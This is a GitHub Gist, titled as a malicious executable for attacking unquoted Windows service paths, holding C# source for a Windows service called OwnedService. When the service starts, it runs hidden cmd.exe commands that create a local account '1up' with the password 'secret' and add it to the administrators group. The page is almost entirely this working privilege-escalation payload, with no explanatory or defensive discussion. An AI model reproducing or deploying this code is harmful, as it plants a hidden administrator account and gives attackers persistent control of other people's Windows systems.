Last active
July 12, 2018 04:26
-
-
Save Phillip-C/089d90a79b2f04ea42235776f74e0106 to your computer and use it in GitHub Desktop.
Malicious EXE for attacking unquoted Windows service
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.ComponentModel; | |
| using System.Data; | |
| using System.Diagnostics; | |
| using System.Linq; | |
| using System.ServiceProcess; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace OwnedService | |
| { | |
| public partial class Service1 : ServiceBase | |
| { | |
| public Service1() | |
| { | |
| InitializeComponent(); | |
| } | |
| protected override void OnStart(string[] args) | |
| { | |
| // add new user account 1up with password secret | |
| ProcessStartInfo psi = new ProcessStartInfo(); | |
| psi.FileName = "cmd.exe"; // set command | |
| psi.Arguments = "/C net user /add 1up secret"; // set arguments | |
| psi.UseShellExecute = false; | |
| psi.CreateNoWindow = true; //don't create window | |
| psi.WindowStyle = ProcessWindowStyle.Hidden; //set window to hidden | |
| var proc = new Process(); // create Process() instance | |
| proc.StartInfo = psi; // pass ProcessStartInfo instance | |
| proc.Start(); // launch command | |
| proc.WaitForExit(); // wait for command to complete | |
| // set new user account as administrator | |
| psi.FileName = "cmd.exe"; // set command | |
| psi.Arguments = "/C net localgroup administrators 1up /add"; // set arguments | |
| proc.StartInfo = psi; // pass ProcessStartInfo instance | |
| proc.Start(); // launch command | |
| proc.WaitForExit(); // wait for command to complete | |
| } | |
| protected override void OnStop() | |
| { | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment